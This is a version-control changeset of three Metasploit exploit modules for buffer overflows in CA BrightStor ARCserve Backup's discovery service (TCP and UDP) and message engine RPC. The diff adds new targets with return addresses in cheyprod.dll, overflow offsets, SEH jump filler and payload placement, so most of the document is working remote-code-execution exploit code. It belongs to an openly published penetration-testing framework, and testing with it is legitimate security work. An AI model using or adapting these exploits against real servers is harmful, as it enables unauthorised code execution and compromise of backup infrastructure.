Changeset 5471
- Timestamp:
- 04/09/08 08:04:15 (1 month ago)
- Files:
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework3/trunk/modules/exploits/windows/brightstor/discovery_tcp.rb
r4498 r5471 18 18 19 19 include Exploit::Remote::Tcp 20 include Exploit:: Remote::Seh20 include Exploit::Seh 21 21 22 22 def initialize(info = {}) … … 31 31 This module is based on the 'cabrightstor_disco' exploit by 32 32 Thor Doomen. 33 34 33 }, 35 'Author' => [ 'hdm' ],34 'Author' => [ 'hdm', 'patrick' ], 36 35 'License' => MSF_LICENSE, 37 36 'Version' => '$Revision$', … … 41 40 [ 'BID', '12536'], 42 41 [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'], 43 [ ' MIL', '15'],44 42 [ 'URL', 'http://milw0rm.com/exploits/1131'], 43 [ 'CVE', '2005-2535'], 45 44 ], 46 45 'Privileged' => true, … … 60 59 }, 61 60 ], 61 [ 62 'cheyprod.dll 07/21/2004', 63 { 64 'Platform' => 'win', 65 'Ret' => 0x23805d10, # pop/pop/ret 66 }, 67 ], 62 68 ], 63 69 'DisclosureDate' => 'Feb 14 2005', … … 71 77 72 78 def check 73 79 74 80 # The first request should have no reply 75 81 csock = Rex::Socket::Tcp.create( framework3/trunk/modules/exploits/windows/brightstor/discovery_udp.rb
r4419 r5471 1 1 ## 2 # $Id :$2 # $Id$ 3 3 ## 4 4 … … 28 28 request is sent to UDP port 41524, triggering a stack 29 29 overflow. 30 31 30 }, 32 'Author' => [ 'hdm' ],31 'Author' => [ 'hdm', 'patrick' ], 33 32 'License' => MSF_LICENSE, 34 'Version' => '$Revision $',33 'Version' => '$Revision', 35 34 'References' => 36 35 [ … … 39 38 [ 'CVE', '2005-0260'], 40 39 [ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'], 41 [ 'MIL', '14'],42 43 40 ], 44 41 'Privileged' => true, … … 56 53 'Platform' => 'win', 57 54 'Ret' => 0x23808eb0, # call to edi reg 55 'Offset' => 968, 58 56 }, 59 57 ], 58 [ 59 'cheyprod.dll 07/21/2004', 60 { 61 'Platform' => 'win', 62 'Ret' => 0x2380a908, # call edi 63 'Offset' => 970, 64 }, 65 ], 60 66 ], 61 67 'DisclosureDate' => 'Dec 20 2004', … … 109 115 print_status("Trying target #{target.name}...") 110 116 111 buf = 'X' * 4096117 buf = rand_text_english(4096) 112 118 119 # Target 0: 120 # 113 121 # esp @ 971 114 122 # ret @ 968 115 123 # edi @ 1046 116 # end = 4092 124 # end = 4092 117 125 118 buf[ 968, 4] = [ target.ret ].pack('V')126 buf[target['Offset'], 4] = [ target.ret ].pack('V') 119 127 buf[1046, payload.encoded.length] = payload.encoded 120 128 framework3/trunk/modules/exploits/windows/brightstor/message_engine.rb
r4419 r5471 1 1 ## 2 # $Id :$2 # $Id$ 3 3 ## 4 4 … … 24 24 'Description' => %q{ 25 25 This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup 26 11. 5. By sending a specially crafted RPC request, an attacker could overflow the27 buffer and execute arbitrary code.26 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow 27 the buffer and execute arbitrary code. 28 28 }, 29 'Author' => [ 'MC' ],29 'Author' => [ 'MC', 'patrick' ], 30 30 'License' => MSF_LICENSE, 31 31 'Version' => '$Revision$', … … 34 34 [ 'CVE', '2007-0169' ], 35 35 [ 'BID', '22005' ], 36 [ 'OSVDB', '31319' ], # There is a lot of confusion 36 37 ], 37 38 'Privileged' => true, … … 49 50 'Targets' => 50 51 [ 51 [ 'BrightStor ARCserve r11.5', { 'Ret' => 0x2380ceb5 } ], 52 [ 'BrightStor ARCserve r11.5 SP2', { 'Ret' => 0x2380a47d } ], 53 ], 52 [ 'BrightStor ARCserve r11.1', { 'Ret' => 0x23805d10 } ], #p/p/r cheyprod.dll 07/21/2004 53 [ 'BrightStor ARCserve r11.5', { 'Ret' => 0x2380ceb5 } ], 54 [ 'BrightStor ARCserve r11.5 SP2', { 'Ret' => 0x2380a47d } ], 55 ], 54 56 'DisclosureDate' => 'Jan 11 2007', 55 'DefaultTarget' => 0))57 'DefaultTarget' => 1)) 56 58 57 59 register_options([ Opt::RPORT(6503) ], self.class) … … 67 69 print_status("Bound to #{handle} ...") 68 70 69 filler = rand_text_english(616) + "\xeb\x06"+ rand_text_english(2) + [target.ret].pack('V')71 filler = rand_text_english(616) + Rex::Arch::X86.jmp_short(6) + rand_text_english(2) + [target.ret].pack('V') 70 72 71 73 sploit = NDR.string(filler + payload.encoded + "\x00") + NDR.long(0) … … 83 85 84 86 end 85 end 87 end
